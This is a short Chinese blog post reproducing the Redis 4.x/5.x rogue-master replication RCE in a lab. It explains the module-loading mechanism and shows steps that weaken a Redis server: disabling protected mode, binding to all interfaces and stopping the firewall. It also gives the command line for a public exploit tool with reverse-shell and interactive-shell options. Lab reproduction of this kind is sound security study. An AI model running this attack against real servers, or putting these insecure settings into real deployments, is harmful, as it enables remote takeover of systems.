Mamor's Blog
0%

redisRCE复现

发表于 分类于
本文字数: 902 阅读时长 ≈ 1 分钟

redis4.x/5.x RCE

影响版本

4.x-5.x

主从模式

主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。

redis模块

在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实现一个新的Redis命令,通过写c语言并编译出.so文件。

利用原理

在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载so文件,我们就可以执行拓展的新命令了。

环境搭建

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# 下载redis
wget http://download.redis.io/releases/redis-5.0.0.tar.gz
tar -xvzf redis-5.0.0.tar.gz
cd redis-5.0.0
make

# 更改配置文件
cd redis-5.0.0
vim redis.conf
      protected-mode yes 改为protected-mode no
      bind 127.0.0.1 改为 bind 0.0.0.0

# 启动redis
cd src
./redis-server ../redis.conf   # 加载指定配置

# 关闭防火墙
systemctl stop firewalld

漏洞复现

exp下载 https://github.com/n0b0dyCN/redis-rogue-server

用法:python3 redis-rogue-server.py --rhost=192.168.0.182 --lhost=192.168.0.128 --exp=exp.so

-r 反弹shell -i 实时shell

Reference

https://paper.seebug.org/975/

http://www.feidao.site/wordpress/?p=2090

https://blog.csdn.net/weixin_43252204/article/details/115181128

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------